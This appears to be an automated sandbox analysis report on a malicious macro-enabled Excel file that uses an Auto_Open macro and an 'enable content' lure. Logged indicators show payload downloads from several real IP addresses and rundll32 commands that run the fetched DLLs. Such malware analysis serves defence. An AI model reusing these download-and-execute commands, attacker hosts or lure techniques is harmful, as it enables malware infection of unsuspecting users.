Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\rundll32.exe |
Source: global traffic |
DNS query: name: 44293.7276049768.dat |
Source: global traffic |
TCP traffic: 192.168.2.22:49169 -> 188.119.112.114:80 |
Source: global traffic |
TCP traffic: 192.168.2.22:49167 -> 188.127.230.104:80 |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
DNS query: 44293.7276049768.dat is down |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
DNS query: 44293.7276049768.dat is down |
Source: Joe Sandbox View |
IP Address: 188.119.112.114 188.119.112.114 |
Source: Joe Sandbox View |
IP Address: 188.127.230.104 188.127.230.104 |
Source: unknown |
DNS traffic detected: query: 44293.7276049768.dat replaycode: Name error (3) |
Source: global traffic |
HTTP traffic detected: GET /44293.7276049768.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 188.119.112.114Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /44293.7276049768.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.82.219.75Connection: Keep-Alive |
Source: unknown |
TCP traffic detected without corresponding DNS query: 188.127.230.104 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 188.127.230.104 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 188.127.230.104 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 188.127.230.104 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 188.127.230.104 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 188.127.230.104 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 188.119.112.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 188.119.112.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 188.119.112.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 188.119.112.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.82.219.75 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.82.219.75 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.82.219.75 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.82.219.75 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 188.119.112.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.82.219.75 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.82.219.75 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 188.119.112.114 |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A4B9C4AC.jpeg |
Jump to behavior |
Source: global traffic |
HTTP traffic detected: GET /44293.7276049768.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 188.119.112.114Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /44293.7276049768.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.82.219.75Connection: Keep-Alive |
Source: rundll32.exe, 00000004.00000002.2205313845.0000000001CB0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2202746600.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2196756284.0000000001C80000.00000002.00000001.sdmp |
String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail) |
Source: unknown |
DNS traffic detected: queries for: 44293.7276049768.dat |
Source: rundll32.exe, 00000004.00000002.2205313845.0000000001CB0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2202746600.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2196756284.0000000001C80000.00000002.00000001.sdmp |
String found in binary or memory: http://investor.msn.com |
Source: rundll32.exe, 00000004.00000002.2205313845.0000000001CB0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2202746600.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2196756284.0000000001C80000.00000002.00000001.sdmp |
String found in binary or memory: http://investor.msn.com/ |
Source: rundll32.exe, 00000004.00000002.2205780989.0000000001E97000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2203001284.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2196966201.0000000001E67000.00000002.00000001.sdmp |
String found in binary or memory: http://localizability/practices/XML.asp |
Source: rundll32.exe, 00000004.00000002.2205780989.0000000001E97000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2203001284.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2196966201.0000000001E67000.00000002.00000001.sdmp |
String found in binary or memory: http://localizability/practices/XMLConfiguration.asp |
Source: rundll32.exe, 00000004.00000002.2205780989.0000000001E97000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2203001284.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2196966201.0000000001E67000.00000002.00000001.sdmp |
String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check |
Source: rundll32.exe, 00000004.00000002.2205780989.0000000001E97000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2203001284.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2196966201.0000000001E67000.00000002.00000001.sdmp |
String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true |
Source: rundll32.exe, 00000004.00000002.2205313845.0000000001CB0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2202746600.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2196756284.0000000001C80000.00000002.00000001.sdmp |
String found in binary or memory: http://www.hotmail.com/oe |
Source: rundll32.exe, 00000004.00000002.2205780989.0000000001E97000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2203001284.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2196966201.0000000001E67000.00000002.00000001.sdmp |
String found in binary or memory: http://www.icra.org/vocabulary/. |
Source: rundll32.exe, 00000004.00000002.2205313845.0000000001CB0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2202746600.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2196756284.0000000001C80000.00000002.00000001.sdmp |
String found in binary or memory: http://www.msnbc.com/news/ticker.txt |
Source: rundll32.exe, 00000006.00000002.2196756284.0000000001C80000.00000002.00000001.sdmp |
String found in binary or memory: http://www.windows.com/pctv. |
Source: Screenshot number: 4 |
Screenshot OCR: Enable editing button from the yellow bar above Onoe you have enabled editing. please click Enabl |
Source: Screenshot number: 4 |
Screenshot OCR: Enable Content bytton from the yellow bar above R jnMl Rr ;r'j i m m RunDLL |~| ,0 There was a |
Source: Screenshot number: 8 |
Screenshot OCR: Enable editing button from the yellow bar above 12 " Onoe you have enabled editing. please click En |
Source: Screenshot number: 8 |
Screenshot OCR: Enable Content bytton from the yellow bar above 13 14 15 16 17 18 19 20 21 22 23 24 25 |
Source: Document image extraction number: 1 |
Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled edding, please click Enable |
Source: Document image extraction number: 1 |
Screenshot OCR: Enable Content bytton from the yellow bar above |
Source: Screenshot number: 12 |
Screenshot OCR: Enable editing button from the yellow bar above 12 " Onoe you have enabled editing. please click En |
Source: Screenshot number: 12 |
Screenshot OCR: Enable Content bytton from the yellow bar above 13 14 15 16 17 18 19 20 21 22 23 24 25 |
Source: Comission_1980420924_03172021.xlsm |
Initial sample: EXEC |
Source: Comission_1980420924_03172021.xlsm |
Initial sample: Sheet size: 19220 |
Source: workbook.xml |
Binary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15 xr xr6 xr10 xr2" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2"><fileVersion appName="xl" lastEdited="7" lowestEdited="7" rupBuild="22730"/><workbookPr/><mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"><mc:Choice Requires="x15"><x15ac:absPath url="E:\Nowiy\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{E74EC3A0-E6C1-4379-B2DF-09ED883A9632}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-108" yWindow="-108" windowWidth="20376" windowHeight="12360" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="sheet" sheetId="1" r:id="rId1"/><sheet name="sheet1" sheetId="2" r:id="rId2"/><sheet name="sheet2" sheetId="8" r:id="rId3"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">sheet1!$AO$168</definedName></definedNames><calcPr calcId="162913"/></workbook> |
Source: rundll32.exe, 00000004.00000002.2205313845.0000000001CB0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2202746600.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2196756284.0000000001C80000.00000002.00000001.sdmp |
Binary or memory string: .VBPud<_ |
Source: classification engine |
Classification label: mal68.troj.expl.evad.winXLSM@7/7@2/3 |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File created: C:\Users\user\Desktop\~$Comission_1980420924_03172021.xlsm |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File created: C:\Users\user\AppData\Local\Temp\CVRDD05.tmp |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File read: C:\Users\desktop.ini |
Jump to behavior |
Source: C:\Windows\System32\rundll32.exe |
Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\rundll32.exe Rundll32 ..\Kiod.hod,DllRegisterServer |
Source: unknown |
Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding |
|
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\rundll32.exe Rundll32 ..\Kiod.hod,DllRegisterServer |
|
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\rundll32.exe Rundll32 ..\Kiod.hod1,DllRegisterServer |
|
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\rundll32.exe Rundll32 ..\Kiod.hod2,DllRegisterServer |
|
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\rundll32.exe Rundll32 ..\Kiod.hod,DllRegisterServer |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\rundll32.exe Rundll32 ..\Kiod.hod1,DllRegisterServer |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\rundll32.exe Rundll32 ..\Kiod.hod2,DllRegisterServer |
Jump to behavior |
Source: C:\Windows\System32\rundll32.exe |
Automated click: OK |
Source: C:\Windows\System32\rundll32.exe |
Automated click: OK |
Source: C:\Windows\System32\rundll32.exe |
Automated click: OK |
Source: Window Recorder |
Window detected: More than 3 window changes detected |
Source: Comission_1980420924_03172021.xlsm |
Initial sample: OLE zip file path = xl/drawings/drawing2.xml |
Source: Comission_1980420924_03172021.xlsm |
Initial sample: OLE zip file path = xl/drawings/drawing3.xml |
Source: Comission_1980420924_03172021.xlsm |
Initial sample: OLE zip file path = xl/drawings/_rels/drawing2.xml.rels |
Source: Comission_1980420924_03172021.xlsm |
Initial sample: OLE zip file path = xl/drawings/_rels/drawing3.xml.rels |
Source: Comission_1980420924_03172021.xlsm |
Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |